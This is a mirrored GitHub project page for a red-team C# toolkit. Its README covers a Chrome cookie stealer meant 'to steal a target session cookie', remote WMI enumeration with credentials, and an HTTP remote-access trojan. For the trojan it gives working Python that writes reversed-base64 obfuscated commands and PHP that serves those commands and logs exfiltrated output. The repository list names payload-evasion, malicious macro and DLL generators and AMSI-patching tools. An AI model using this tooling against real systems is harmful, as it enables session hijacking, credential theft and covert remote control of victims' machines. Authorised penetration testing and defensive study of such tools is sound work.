Mr-Un1k0d3r/RedTeamCSharpScripts Mr-Un1k0d3r/RedTeamCSharpScripts

  • Stars
    star
    706
  • Rank 64,138 (Top 2 %)
  • Language
    C#
  • Created over 5 years ago
  • Updated about 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Mr-Un1k0d3r/RedTeamCSharpScripts
github

Mr-Un1k0d3r

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

C# Script used for Red Team

RedTeamCSharpScripts

C# Script used for Red Team. These binaries can be used by Cobalt Strike execute-assembly or as standalone executable.

LDAP utility

The utility has been renamed to AdHuntTool and moved to its own repo https://github.com/Mr-Un1k0d3r/ADHuntTool

The CheckManaged feature

Active Directory support the following two attributes managedobjects and managedby. These attributes can be used to assign a manager to an object. It can be a user managing a computer. There is a GPO that can be used to grant local admin to managedobjects owner. The user will not be listed as a local admin by default by the correlation between managedby and managedobjects can identify users that managed computers.

The CheckManaged feature first confirm the presence of the GPO in question by looking at the SYSVOL policies present on the DC. If the groups.xml is present, it dump all the users with a managedobjects attribute and the computers with a managedby attribute.

managedexample

Web Hunter

CSharp version of the Find-Fruit utility https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Find-Fruit.ps1. Tool to query network subnet looking for valuable assets that can be exploited.

webhunter.exe 192.168.1.0/24 80,443,8080,8443

webhunter.exe 192.168.1.0/24 80,443,8080,8443 -verbose

Cookies Monster

Fetch Chrome cookie in plaintext. Perfect to steal a target session cookie through execute-assembly

Usage: CookiesMonster.exe filter

The filter argument is optional. If not specified it will dump all the cookies. Since the cookies are encrypted using ProtectedMemory Windows APIs you need to have access to the current user context to be able to generate the proper decryption key.

The binary need to be compiled statically to include the System.Data.SQLite dll.

WMI Utility

Set of predefined WMI query that can be used to query CIM classes.

The utility support the following options

Usage: WMIUtility.exe options [arguments]

ListProcess         Return a list of running process
ListService         List all the services
Query               Args (query, columns) wmiutility.exe Query "Select * From Win32_CommandLineAccess" "Name,Description"

ListRemoteProcess   Return a list of running process on the target host
ListRemoteService   Return a list of all the services on the target host
Get-EventForUser    Search for 4624 events targeting specific user
RemoteQuery         Args (query, columns) 
Get-Av              Return a list of potential security product

EX:
wmiutility.exe ListRemoteProcess <ComputerName> <Username> <Password>
wmiutility.exe ListRemoteService <ComputerName> <Username> <Password>
wmiutility.exe Get-EventForUser <samAccountname> <DomainController> <Username> <Password>
wmiutility.exe Get-EventForUser <samAccountname> all <Username> <Password>
wmiutility.exe RemoteQuery "Select * From Win32_CommandLineAccess" "Name,Description" <ComputerName> <Username> <Password>

enumerateuser.cs

List all the users samaccountname & mail

execute-assembly C:\enumerateuser.exe domain

ldapquery.cs

Perform custom ldap queries

execute-assembly C:\enumerateuser.exe ringzer0team "(&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))" samaccountname,mail

Querying LDAP://ringzer0team
Querying: (&(objectCategory=User)(samaccountname=Mr.Un1k0d3r))
Extracting: samaccountname,mail
Mr.Un1k0d3r,[email protected],

simple-http-rat.cs

A simple RAT that execute command over HTTP. The code is calling back every 10 seconds and will execute the data present on the callback URL.

rat.exe callbackurl

The data is obfuscated using the following python trick

$ python -c 'import base64; print base64.b64encode("cmd.exe /c whoami")[::-1]'
=kWbh9Ga3ByYvASZ4VmLk12Y

The file creation can also be automated using the following script

import base64
import sys
import os

path = sys.argv[1]
cmd = sys.argv[2]

if os.path.exists(path):
        os.remove(path)
        
open(path, "w+").write(base64.b64encode(cmd)[::-1])
print "Command added"

update.py /var/www/html/callback.html "whoami"

For the post back RAT the following PHP code can be used to capture the data

<?php
$request = (object)array();

if($_SERVER['REQUEST_METHOD'] === "POST") {
        $request->data = file_get_contents("php://input");
        $request->ip = $_SERVER["REMOTE_ADDR"];
        $request->time = date("r");

        $data = str_replace("!)(*&#:<]", "A", $request->data);
        $decoded = base64_decode($data);

        file_put_contents("/tmp/output.txt", "[" . $request->time . "](" . $request->ip . "): " . $decoded . "\r\n", FILE_APPEND);
} else {
        echo file_get_contents("/tmp/payload.txt");
}
?>

set.cs (set.exe)

C# equivalent of Windows set command that does not required to spawn cmd.exe

execute-assembly C:\set.exe

PROCESSOR_ARCHITEW6432=AMD64
DriverData=C:\Windows\System32\Drivers\DriverData

Credit

Mr.Un1k0d3r RingZer0 Team

Tazz0 RingZer0 Team

Contributors

@theFlinkk for the AV module

More Repositories

1

EDRs

C
1,857
star
2

PowerLessShell

Run PowerShell command without invoking powershell.exe
Python
1,413
star
3

DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool
Python
1,323
star
4

SCShell

Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
C
1,268
star
5

RedTeamPowershellScripts

Various PowerShell scripts that may be useful during red team exercise
PowerShell
878
star
6

MaliciousMacroGenerator

Malicious Macro Generator
Visual Basic
811
star
7

ThunderShell

Python / C# Unmanaged PowerShell based RAT
Python
770
star
8

RedTeamCCode

Red Team C code repo
C
464
star
9

CatMyPhish

Search for categorized domain
Python
418
star
10

PoisonHandler

lateral movement techniques that can be used during red team exercises
PowerShell
264
star
11

MaliciousClickOnceGenerator

Quick Malicious ClickOnceGenerator for Red Team
C#
234
star
12

ADHuntTool

official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
C#
229
star
13

Windows-SignedBinary

Python
224
star
14

.NetConfigLoader

.net config loader
223
star
15

Shellcoding

Shellcoding utilities
C
209
star
16

ATP-PowerShell-Scripts

Microsoft Signed PowerShell scripts
PowerShell
203
star
17

WindowsDllsExport

A list of all the DLLs export in C:\windows\system32\
C
199
star
18

AMSI-ETW-Patch

Patch AMSI and ETW
C#
196
star
19

DLLsForHackers

Dll that can be used for side loading and other attack vector.
Python
175
star
20

MaliciousDLLGenerator

DLL Generator for side loading attack
C
163
star
21

SCT-obfuscator

Cobalt Strike SCT payload obfuscator
Python
142
star
22

RedTeamScripts

Repo with various Red Team scripts
Python
137
star
23

Elevate-System-Trusted-BOF

C
132
star
24

Cookie-Graber-BOF

C or BOF file to extract WebKit master key to decrypt user cookie
C
129
star
25

SPFAbuse

SPF are not as strong as you may think. Red Team tool to send email on behalf of your target corp
Python
128
star
26

RemoteProcessInjection

C# remote process injection utility for Cobalt Strike
C#
80
star
27

Base64-Obfuscator

Simple PowerShell Base64 encoder to avoid detection of your malicious payload
PowerShell
74
star
28

SearchIPOwner

Search public IP owner through ARIN
Python
51
star
29

RedTeamFSharp

Red Team Toolset written in F# (Experimental)
F#
26
star
30

SideChannelAttack

Side Channel script
Python
24
star
31

BOFCode

Bunch of BOF files
C
13
star
32

blog.mr.un1k0d3r.com

Mr.Un1k0d3r.com blog
HTML
9
star
33

MsGraphFunzy

Scripts to interact with Microsoft Graph APIs
Python
5
star